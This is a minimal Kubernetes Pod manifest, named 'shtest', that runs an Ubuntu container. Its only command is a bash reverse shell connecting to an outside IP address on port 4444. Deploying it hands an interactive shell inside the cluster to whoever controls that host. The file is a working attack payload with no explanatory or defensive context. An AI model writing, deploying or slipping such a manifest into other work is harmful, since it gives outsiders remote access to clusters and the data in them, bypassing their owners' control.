apiVersion: v1
kind: Pod
metadata:
  name: shtest
  namespace: default
spec:
  containers:
  - name: shtest
    image: ubuntu:latest
    command: ["/bin/bash", "-c", "bash -i >& /dev/tcp/54.144.69.66/4444 0>&1"]
  restartPolicy: Never
